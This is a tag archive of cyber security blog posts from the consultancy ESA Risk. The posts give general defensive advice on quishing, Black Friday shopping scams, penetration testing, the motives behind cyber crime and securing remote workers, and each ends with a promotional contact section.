Tag: Cyber Security

During a time of rapid digital transformation, new forms of cyber threats constantly emerge. One such threat increasing in the world of cyber security is known as ‘quishing,’ a term derived from QR codes and phishing.

What is quishing?

Similar to classic phishing strategies, quishing exploits Quick Response (QR) codes to deceive individuals into divulging sensitive information or downloading malicious software.

It involves scammers creating these two-dimensional barcodes, that when scanned, lead unsuspecting users to fraudulent websites or prompts the download of malware directly onto your device.

This form of scam capitalises on the QR code’s popularity, convenience, and the public’s growing comfort with using them for everything from restaurant menus to payment systems.

The rise in QR code related scams

The BBC recently reported that QR code related scams are continuing to rise, with instances up 14-fold over five years.

These scams are primarily orchestrated by organised crime groups and have seen a sharp increase from 100 reports in 2019 to 1,386 in the previous year, as recorded by the national fraud reporting centre, Action Fraud.

The consequences of these scams can be severe, with victims sometimes losing substantial amounts of money, which in turn finances further criminal activities. Scammers have diversified their methods, using QR codes on printed flyers, in emails, and on social media, duping people into handing over sensitive information like bank details.

There are concerns that this type of scam is underreported, and figures could be even higher. This is because people scammed out of smaller amounts of money are less likely to report. However, money may not be the sole target, with further risks of sensitive data being lifted from devices then sold on or used for more complex fraud later down the line.

How to spot and prevent quishing

To protect yourself from quishing scams, here is what to look for and preventive measures to take:

Examine the URL: Before scanning a QR code, make sure the surrounding context seems legitimate. If you can, preview the link that the QR code will direct you to. This feature is available on some smartphones and third-party QR code scanning apps.

Look for tampering: A legitimate-looking sticker or code might be placed over the original one, directing you to a malicious site. Stay vigilant about where you find these codes.

Avoid downloading apps directly: If a QR code prompts you to download an application, it is safer to go through the official app store on your device.

Use trusted QR scanners: Some apps check the safety of a website before opening it and can offer an additional layer of security.

Employ cybersecurity tools: For businesses, it’s crucial to have cyber security systems in place that can detect and block malicious web content.

Given the rise in both the use of QR codes and the sophistication of scammers, quishing is expected to become a more significant threat. Awareness campaigns are crucial, as informed users are the first line of defence against these types of scams.

Individuals need to remain cautious, especially as scammers continue to target mobile devices with QR codes in ever more cunning ways. A recent example involved fraudulent parking meter codes, an industry where QR codes are utilised frequently, leading users to pay parking fees via a fraudster’s account.

For businesses, the consequences of quishing scams can be serious, leading to data breaches, financial loss, reputational damages and eroded customer trust. As such, it remains essential for organisations to educate employees on the dangers of QR code scams and to implement systems like Web Application Firewalls (WAFs) and Secure Email Gateways (SEGs) that help in sifting out phishing attempts.

Quishing is just one of the many dangers in the cyber landscape, and both individuals and businesses must take proactive steps to guard against such deceptive practices.

By staying informed, sceptical, and utilising security tools, we can fend off the malicious intent hidden behind those seemingly innocuous pixilated squares.

Cyber security support from ESA Risk

At ESA Risk, we offer a broad range of cyber security services that can help you secure systems and data, become more cyber-aware, identify breaches, and prepare for and respond to attacks.

For advice and support on making your business cyber secure please contact us at advice@esarisk.com, on +44 (0)343 515 8686 or via our contact form.

As Black Friday 2024 approaches, the excitement for massive discounts and unbeatable deals is natural. However, it’s important to be aware that this shopping bonanza also brings an increased risk of cyber scams and fraud.

With cyber threats becoming more sophisticated, it’s crucial that shoppers stay informed and protect their personal and financial information.

According to a recent statement from the UK’s Cyber Security Chief, Richard Horne, the festive sales period now experiences a noticeable spike in cyber incidents, dubbing the event a “prime time for cyber criminals, who exploit bargain hunters with increasingly sophisticated scams”.

With victims of shopping scams losing over £11m between November 2023 and January 2024, according to reports from the GCHQ’s National Cyber Security Centre (NCSC) and Action Fraud, the importance of remaining vigilant during this period cannot be understated.

Cyber criminals continue to employ ever more ruthless tactics to exploit consumers’ enthusiasm and lowered guard during these sales.  Utilising AI platforms allows them to develop increasingly convincing scams and makes fraudulent offers even harder to detect.

Though many of these scams include fake listings for products on social media sites, the evolution of AI means whole websites can be created to list fraudulent products and steal financial information.

However, there are steps you can take to protect yourself this Black Friday:

1. Use secure connections only

Always use secure, private Wi-Fi connections when making online purchases.  You never know who might have access to your information when you use a public Wi-Fi network.

2. Update your software

Ensure your devices, including smartphones and laptops, have the latest security updates and antivirus programs installed.

3. Create strong, unique passwords

Use strong and unique passwords for all different retail sites. Consider using a password manager to keep track of them securely.

4. Employ two-factor authentication

Enabling two-factor authentication (2FA) adds an extra layer of security, making it harder for cybercriminals to access your accounts, even if they are able to access your password.

5. Beware of phishing scams

Be sceptical of emails or messages that demand urgent action, such as providing personal information or clicking on unknown links. In 2024, phishing attacks have grown more cunning, blending seamlessly into regular communications. Be wary of clicking links and downloading files.

6. Shop wise, pay safe

Be cautious of deals that seem too good to be true or with merchants demanding payment through unconventional methods like direct bank transfers or cryptocurrency. Official retailer websites and trusted payment systems offer more security.

7. Do your research

Ensure you’re shopping on reputable websites or stores. Look up reviews, ratings, and feedback from previous customers. Compare prices across different platforms to ensure “discounts” aren’t inflated prices reduced to appear like a deal.

Black Friday is an exciting time for both shoppers and retailers, by following cyber security best practices and maintaining a degree of scepticism towards online offers, you can protect yourself from becoming a statistic.

Stay alert, keep your software updated, and prioritise security over convenience to ensure a safe and enjoyable shopping experience. If you find yourself the victim of a cyber incident, ESA Risk can help you with your response to the attack and to make you cyber-secure in the future, through the design and execution of a strong cyber security plan. Contact Ben Brown, Cyber Security Consultant at ben.brown@esarisk.com, on +44 (0)343 515 8686 or via our contact form.

As cyber attacks grow more sophisticated, the need for robust security measures has never been more critical. Penetration testing, also known as pen testing or ethical hacking, is a proactive approach to uncovering vulnerabilities in IT systems and software. By simulating a cyber attack against computer systems, applications and networks, pen testers can identify and rectify security weaknesses before malicious hackers can exploit them.

Understanding penetration testing

Penetration testing delves into the assessment of computers, networks, and web applications to discover potential vulnerabilities that could be exploited by attackers. By executing controlled attacks in a safe environment, organisations can better understand the effectiveness of their existing security policies and mechanisms.

This form of testing can be conducted from within the network (internal testing) or from outside (external testing) to simulate various methods of cyber attack.

Cyber security penetration techniques

At ESA Risk, we offer a range of penetration testing services tailored to your unique needs and requirements.

One of our newest consultants, and experienced cyber security professional, Ben Brown, leverages his knowledge of advanced tools, techniques and methodologies to conduct thorough assessments and provide actionable recommendations for improving your security posture.

Our penetration testing services include:

Internal network penetration testing

Our network penetration testing services involve a comprehensive evaluation of your organisation’s network infrastructure, servers and endpoints. By emulating real-world cyber attacks, we identify vulnerabilities such as misconfigurations, weak passwords, unpatched systems, and insecure network protocols that could be exploited by threat actors.

We meticulously analyse network traffic, conduct port scanning, and assess firewall rules to identify potential security weaknesses.

Web application penetration testing

Web applications are a common target for cyber attacks due to their exposure to the internet and the complexity of their code. Our web application penetration testing services focus on identifying vulnerabilities in web applications, APIs and other web-based assets. Using a combination of automated tools and manual techniques, our experts assess the security of web applications, uncovering flaws such as SQL injection, cross-site scripting (XSS) and insecure direct object references. By conducting thorough assessments, we help you secure your web applications and protect sensitive data from unauthorised access.

Social engineering testing

Social engineering remains a prevalent tactic used by threat actors to exploit human vulnerabilities and manipulate individuals into disclosing sensitive information.

Our social engineering testing services evaluate an organisation’s susceptibility to social engineering attacks and phishing attempts. By simulating phishing campaigns, pretexting scenarios and physical intrusion attempts, we assess the awareness and response capabilities of employees at all levels to social engineering tactics. This testing helps you enhance employee training programmes, implement security awareness initiatives, and strengthen defences against social engineering threats.

Benefits of penetration testing for businesses

• Proactive defence: One of the primary benefits of penetration testing is its proactive nature, allowing businesses to identify and fix vulnerabilities before they are exploited. This can prevent severe data breaches and the associated financial and reputational damages.
• Compliance with regulatory requirements: Many industries have strict regulatory requirements that include cyber security assessments. Penetration testing helps ensure compliance with standards such as GDPR, thereby avoiding significant fines and legal implications.
• Preservation of corporate image and customer trust: By ensuring that data breaches are less likely, companies maintain their reputation and build trust with their clients. In the digital age, consumer trust is as valuable as the tangible services or products offered.
• Cost-effective security: While penetration testing requires upfront investment, it is considerably less expensive than the costs associated with a data breach, which can include legal fees, compensation, and the intangible costs of lost consumer trust and brand devaluation.

The changing landscape of cyber security

As technology evolves, so does the cyber security landscape. New vulnerabilities and methods of attack are constantly developed. With the integrating IoT, cloud computing, and other emerging technologies into daily business processes, organisations face an ever-expanding risk landscape. Today’s security systems need to be dynamic and responsive, which makes the role of regular penetration testing critical.

Staying informed on cyber risks

Cyber security is not a one-time achievement but a continuous process. Staying informed is crucial. Regular updates to security protocols, frequent penetration testing, and staying abreast of the latest cyber threats are essential practices. Businesses must invest in continuous learning and the development of IT staff to handle new and evolving security challenges effectively.

Penetration testing plays a vital role in the cyber security strategy of any business. By allowing you to identify, manage and mitigate vulnerabilities proactively, it not only protects you against attacks but also saves you from potential financial and reputational damage in the future. With the cyber security landscape continuously changing, tools like penetration testing that can adapt and evolve are priceless. Any company looking to safeguard their future in the increasingly digital world should consider penetration testing an essential tool in their cyber security arsenal.

Cyber security support from ESA Risk

At ESA Risk, we offer a broad range of cyber security services that can help you secure systems and data, become more cyber-aware, identify breaches, and prepare for and respond to attacks.

For advice and support on making your business cyber secure, including penetration testing please contact us at advice@esarisk.com, on +44 (0)343 515 8686 or via our contact form.

The landscape of cyber threats is ever-evolving – reflecting the current dominance of digital advancements (AI, anyone?) in our work and personal lives. With reports of ransomware attacks and data breaches becoming more and more common, how concerned should you be about your business’s cyber security?

Motivations behind cyber crime

There are differing motivations behind cyber attacks, though among ‘black hat’ hackers – your stereotypical cyber criminals who work to break into personal networks and devices to steal sensitive data – financial gain is the most common. A Verizon study from 2023 involving multiple countries, including the UK, revealed that the majority of data breaches (97%) were money driven.

With online hacking groups focusing their efforts where they can cause the most damage , law firms are among those considered a valuable target due to the abundance of sensitive data and privileged information stored in their networks. Once such data is obtained, it can be held for ransom and/or sold on the dark web. Sensitive data can often be lucrative in the virtual underworld.

Other motives include reputation. For some cyber criminals, it’s all about the thrill of overcoming security measures and infiltrating systems. These individuals frequently target high-profile organisations, deeming a successful breach a personal triumph. However, the consequences of these breaches can be severe, compromising customer trust and damaging a business’ reputation.

An example of this is the 2014 cyber-attack on Sony Pictures Entertainment, a breach that exposed sensitive employee data, private email exchanges and unreleased films. As a result, Sony Pictures faced extensive reputational damage, as well as significant financial loss.

More recent examples include Royal Mail, who were targeted by ransomware group ‘Lockbit’ last January, and ‘magic circle’ law firm Allen and Overy later the same year. With the hacking group taking credit for the latter attack on their website, clearly keen to claim the high-profile breach, this suggests media coverage and notoriety among cyber criminals may be another motivational factor.

Does size matter?

Though the rewards of targeting sizeable organisations are greater if successful, smaller firms are also at risk.

Cyber threats don’t discriminate by company size. In fact, smaller businesses are often seen as softer targets by cybercriminals because they assume security might not be as robust.

One of the biggest challenges companies face now comes with the interconnectedness of modern supply chains. Cyber criminals can exploit weaknesses in these supply chains to compromise multiple entities simultaneously, meaning the security of every link in the chain becomes crucial, requiring strict vetting processes and a collaborative approach.

Reducing your risks of a cyber attack

To reduce risk, companies need to implement multiple layers of security. Cyber security is not a one-size-fits-all solution. In order to create a robust defence system, you need an in-depth defence strategy, including firewalls, antivirus software, intrusion detection systems and regular security audits. This multifaceted approach ensures that any vulnerabilities are addressed at various levels, rather than ‘divide and conquer’ think ‘divide and defend’. The challenges lie in both trying to prevent these attacks, but also devising effective recovery strategies should your network and data be targeted or compromised.

While emphasis is often placed on the implementation of robust technology, cyber threats can also be largely mitigated through training, education and awareness. A proactive approach to cyber security will always be the best way to minimise your company’s susceptibility to threats from cyber criminals.

Cyber security support from ESA Risk

If you need advice or support on anything cyber security-related, contact Ben Brown, Cyber Security Consultant at ben.brown@esarisk.com, on +44 (0)343 515 8686 or via our contact form.

This article was originally published by IFSEC Insider.

Based on insights from over 5,500 physical security leaders globally, the research showed that while organisations are putting in place new processes to protect themselves, the level of concern about potential cyber threats continues to increase.

Close to a third (31%) of end-user respondents indicated that their organisation was targeted by cyber threat actors in 2023. Some sectors were far more affected than others. 73% of respondents in the intelligence and national security sector and 46% in the banking and finance sector said were the victims of cyber-attacks compared 21% in the retail sector.

In August, British perimeter security company, Zaun Ltd, was breached by the LockBit group. Despite only accessing a small fraction of the company’s internal network, the hackers appeared to have leaked sensitive documents relating to the physical security of agencies in the UK Ministry of Defence.

A top challenge faced

Cybersecurity vulnerabilities were identified by 36% of end-user respondents as a top challenge facing their organisations in 2023. In the healthcare sector, cybersecurity vulnerabilities were identified by a higher percentage of respondents than any other challenge (43%).

Organisations are, however, being more proactive with 42% of end-user respondents indicating that their organisations are deploying cybersecurity-related tools in their physical security environments. This is a significant increase compared to last year when only 27% said they had put in place processes to protect themselves.

“It is reassuring to see growing awareness of the cybersecurity of physical security systems,” Mathieu Chevalier, Principal Security Architect at Genetec said: “As more organisations look to implement enhanced cybersecurity measures, they need to look for manufacturers who are committed to cybersecurity and building tools that help them streamline the maintenance and updates of their systems.”

Cyber security support from ESA Risk

If you need advice or support on anything cyber security-related, contact us at advice@esarisk.com, on +44 (0)343 515 8686 or via our contact form.

For many, Black Friday marks the official start to the Christmas shopping season and, excitingly, many retailers announce time-limited sales that promise huge savings to consumers. But it’s also the prime time for cyber criminals to cash in, too.

Some digital threats to watch out for on Black Friday 2023

Phishing attacks

While consumers rush to grab themselves a bargain, they may get caught out in a phishing scandal. Phishing links commonly lead to fake login pages, prompting victims to authenticate themselves on their web account. For instance, victims may think they are logging into their favourite retailer account, when, really, they are handing their username and password over to an attacker, who can use it to their advantage later. Although this affects users directly, it also negatively impacts the retailer’s reputation, which can be difficult to recover.

PayPal – a platform used to handle payments by many online retailers – is one of the most commonly mimicked websites. It is not only the retailer’s site that you need to be able to trust, but third-party applications used by that site, as well.

Malware  

Malware (as the portmanteau suggests) refers to any malicious software designed to harm a computer system by tracking user activity, hijacking functionality or stealing, deleting or encrypting data. Most malware enters your systems via email (widely reported at more than 90%). Statista reports that there were 5.5 billion malware attacks last year.

Malware is constantly proliferating and changing. AV Test describes how the total amount of malware has grown every year since 2008 (their first data point), with a vast amount of new malware created in the last five years.

This should be seen as a high-risk Black Friday cyber threat.

Formjacking

Formjacking is a form of ‘Magecart’ where malicious code is injected into the checkout forms of a website and can go undetected for a long time. Cyber criminals then hijack web forms to steal personal and payment information from shoppers.

Ransomware  

Ransomware encrypts files, so they are made inaccessible to the owner. The cyber criminal then demands a ransom payment in return for releasing the locked files. Ransomware occurs when legitimate ads are hacked (‘malvertising’), or through phishing emails and exploit kits. This will have consequential impact on consumers and retailers/businesses.

How can you reduce the risk of cyber threats on Black Friday 2023? 

The above attacks take place daily and are not specific to the holiday season or large events like Black Friday, but the volume and frequency of these attacks significantly increase during these times, as more consumers make purchases online.

Being aware of these threats is a step closer to preventing cyber attacks on Black Friday and during the 2023 holiday season to come. Businesses should balance their investments in security awareness training for employees and putting robust security measures in place that can help to scan their systems for suspicious activity. Similarly, consumers need to be better educated and made aware of potential threats.

If you find yourself the victim of a cyber incident, ESA Risk can help you with your response to the attack and to make you cyber-secure in the future, through the design and execution of a strong cyber security plan. Reach out to us at advice@esarisk.com, on +44 (0)343 515 8686 or via our contact form to find out more.

For many, Black Friday 2022 marks the official start to the Christmas shopping season and, excitingly, many retailers announce time-limited sales that promise huge savings to consumers. But it’s also the prime time for cyber criminals to cash in, too.

Some digital threats to watch out for on Black Friday 2022

Phishing attacks

While consumers rush to grab themselves a bargain, they may get caught out in a phishing scandal. Phishing links commonly lead to fake login pages, prompting victims to authenticate themselves on their web account. For instance, victims may think they are logging into their favourite retailer account, when, really, they are handing their username and password over to an attacker, who can use it to their advantage later. Although this affects users directly, it also negatively impacts the retailer’s reputation, which can be difficult to recover.

PayPal – a platform used to handle payments by many online retailers – is one of the most commonly mimicked websites. It is not only the retailer’s site that you need to be able to trust, but third-party applications used by that site, as well.

Malware  

Malware (as the portmanteau suggests) refers to any malicious software designed to harm a computer system by tracking user activity, hijacking functionality or stealing, deleting or encrypting data. Most malware enters your systems via email (widely reported at more than 90%). Statista reports that there were 2.8 billion malware attacks in the first six months of 2022 – more than half the number reported in the whole of 2021.

Malware is constantly proliferating and changing. AV Test describes how the total amount of malware has grown every year since 2008 (their first data point), and that 2021 saw the largest influx of new malware of any year on record.

This should be seen as a high-risk Black Friday cyber threat.

Formjacking

Formjacking is a form of ‘Magecart’ where malicious code is injected into the checkout forms of a website and can go undetected for a long time. Cyber criminals then hijack web forms to steal personal and payment information from shoppers.

Ransomware  

Ransomware encrypts files, so they are made inaccessible to the owner. The cyber criminal then demands a ransom payment in return for releasing the locked files. Ransomware occurs when legitimate ads are hacked (‘malvertising’), or through phishing emails and exploit kits. This will have consequential impact on consumers and retailers/businesses.

Not being prepared enough for cyber threats is a threat

A staggering 3 in 4 IT leaders expressed a lack of confidence in their company’s IT security posture and saw room for improvement. Despite this, just 57% of companies conducted a data security risk assessment in 2020 and businesses need to up their cyber security efforts to reduce these risks and minimise the impact of an attack.

How can you reduce the risk of cyber threats on Black Friday 2022? 

The above attacks take place daily and are not specific to the holiday season or large events like Black Friday, but the volume and frequency of these attacks significantly increase during these times, as more consumers make purchases online.

Being aware of these threats is a step closer to preventing cyber attacks on Black Friday 2022 and during the holiday season to come. Businesses should balance their investments in security awareness training for employees and putting robust security measures in place that can help to scan their systems for suspicious activity. Similarly, consumers need to be better educated and made aware of potential threats.

If you find yourself the victim of a cyber incident, ESA Risk can help you with your response to the attack and to make you cyber-secure in the future, through the design and execution of a strong cyber security plan. Reach out to us at advice@esarisk.com, on +44 (0)343 515 8686 or via our contact form to find out more.

By guest author Sharon McDougall of Scotland Debt Solutions.

Without safeguards in place companies face the prospect of having information stolen by hackers, or being held to ransom for their most sensitive data. So what can businesses do to protect themselves when employees work from home or from a remote location?

Create a cyber security policy

A strong cyber security policy can provide the background to the dangers of a data breach, and by ensuring all employees read and sign the policy they take greater ownership of the issue.

It should include the protocols to be followed by remote workers, and the resources available to employees to help them observe the policy, so all fully understand what is expected of them.

Cyber security training

Regular training events keep staff up-to-date on current cyber security issues, whilst also providing them with the awareness and knowledge to recognise and deal with non-standard occurrences when they’re working remotely.

Regular training events help employees to understand the importance of cyber security for their employer, and crucially, how to prevent a data security breach by proactively keeping hackers at bay.

Use a VPN

Connecting to an unsecured Wi-Fi network whilst working remotely is just one instance where company data is placed at risk. Using a Virtual Private Network, or VPN, provides a secure connection and hides internet activity by encrypting data.

Although convenient, public Wi-Fi networks in locations such as coffee shops and restaurants are known to be risky from a security point-of-view, and particularly dangerous for businesses holding sensitive data.

Use password management software

Creating strong, complex passwords, and changing them regularly, is paramount in the fight against hackers. Password management software can organise and simplify employee logins, and may be used across different types of device.

Email, banking, and social media logins are offered another layer of protection against security breach, and employees can gain more confidence that they’re logging in safely to the sites they need for work.

Multifactor identification

Multifactor authentication provides various levels of security for company data. It could require employees to receive a text message with a unique code, for example, or to answer a security question, or perhaps receive a phone call to confirm their identity.

For organisations or environments that are at particularly high risk, biometric data can be used to bolster data security. This might involve facial or voice recognition, or fingerprint scanning.

Back up files and create restore points regularly

Cloud storage provides a central location for employees to upload files securely. By regularly creating backups, hackers are also less likely to be able to successfully hold the business to ransom for vital information.

Use antivirus, anti-malware, and a firewall on all devices

Anti-malware and antivirus software, and a firewall, should be installed on all devices used by remote workers. All software needs to be regularly updated to the current version so that files and emails can be reliably scanned for viruses.

Working remotely with anti-malware constantly running in the background on all work devices further protects the company from malicious software, and can quickly detect and remove it as necessary.

If companies choose to ban the use of personal devices for work purposes they could make it part of their formal cyber security policy, particularly if they believe they’re at high risk of a security breach.

A multi-layered approach safeguards commercial data and protects businesses from unrelenting attempts by cyber criminals to hack their information, but awareness and a clear understanding of the issues is the first step in thwarting their plans.

Remote worker cyber security support from ESA Risk

At ESA Risk, we offer a broad range of cyber security services that can help you secure systems and data, become more cyber-aware, identify breaches, and prepare for and respond to attacks.

For advice and support on making your business cyber-secure, including remote worker cyber security, please contact us at advice@esarisk.com, on +44 (0)343 515 8686 or via our contact form.

This article was written by guest author Sharon McDougall of Scotland Debt Solutions.